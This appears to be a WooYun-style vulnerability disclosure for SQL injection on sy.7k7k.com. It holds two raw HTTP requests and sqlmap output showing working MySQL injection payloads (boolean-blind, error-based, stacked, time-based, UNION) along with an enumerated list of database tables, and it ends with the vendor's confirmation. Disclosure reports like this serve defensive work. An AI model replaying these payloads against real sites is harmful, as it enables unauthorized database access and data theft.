2015-07-13: 细节已通知厂商并且等待厂商处理中 2015-07-13: 厂商已经确认,细节仅向厂商公开 2015-07-23: 细节向核心白帽子及相关领域专家公开 2015-08-02: 细节向普通白帽子公开 2015-08-12: 细节向实习白帽子公开 2015-08-27: 细节向公众公开
2处
1,POST /index.php/game/searchgame/ HTTP/1.1Content-Length: 63Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: sy.7k7k.comCookie: Host: sy.7k7k.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36Accept: */*game=1&way=22,POST /index.php/data/index HTTP/1.1Content-Length: 200Content-Type: application/x-www-form-urlencodedX-Requested-With: XMLHttpRequestReferer: sy.7k7k.comCookie: Host: sy.7k7k.comConnection: Keep-aliveAccept-Encoding: gzip,deflateUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36Accept: */*channel=10001&etime=2015-07-13&gameid=0&gamename=1&stime=2015-07-07
---Parameter: game (POST) Type: boolean-based blind Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: game=1' RLIKE (SELECT (CASE WHEN (1793=1793) THEN 1 ELSE 0x28 END)) AND 'MKxr'='MKxr&way=2 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: game=1' AND (SELECT 5800 FROM(SELECT COUNT(*),CONCAT(0x716b627171,(SELECT (ELT(5800=5800,1))),0x71786a7a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'nhoY'='nhoY&way=2 Type: stacked queries Title: MySQL > 5.0.11 stacked queries (SELECT - comment) Payload: game=1';(SELECT * FROM (SELECT(SLEEP(5)))lWuP)#&way=2 Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: game=1' AND (SELECT * FROM (SELECT(SLEEP(5)))seqL) AND 'qkVC'='qkVC&way=2 Type: UNION query Title: MySQL UNION query (random number) - 21 columns Payload: game=-9030' UNION ALL SELECT 1170,1170,1170,1170,1170,1170,1170,1170,1170,1170,1170,1170,1170,1170,CONCAT(0x716b627171,0x59554853784c564d4853,0x71786a7a71),1170,1170,1170,1170,1170,1170#&way=2---back-end DBMS: MySQL 5.0current user: SYweb_SLT@192.168.11.311Database: web7k_sy[67 tables]+---------------------+| open_chanel_users || open_channel || open_channelinfo || open_cp || open_cpapp || open_download_count || open_game || open_gonggao || open_orders || open_pay_channel || open_paycount || open_reg_phone || open_union || open_user || open_user0 || open_user1 || open_user10 || open_user11 || open_user12 || open_user13 || open_user14 || open_user15 || open_user16 || open_user17 || open_user18 || open_user19 || open_user2 || open_user20 || open_user21 || open_user22 || open_user23 || open_user24 || open_user25 || open_user26 || open_user27 || open_user28 || open_user29 || open_user3 || open_user30 || open_user31 || open_user32 || open_user33 || open_user34 || open_user35 || open_user36 || open_user37 || open_user38 || open_user39 || open_user4 || open_user40 || open_user41 || open_user42 || open_user43 || open_user44 || open_user45 || open_user46 || open_user47 || open_user48 || open_user49 || open_user5 || open_user50 || open_user6 || open_user7 || open_user8 || open_user9 || open_user_config || open_user_ext |+---------------------+
check
危害等级:高
漏洞Rank:20
确认时间:2015-07-13 10:53
谢谢白帽子反馈。已交给相关技术处理。
暂无
走的小厂,求多给些rank,再也不要最后是1rank了。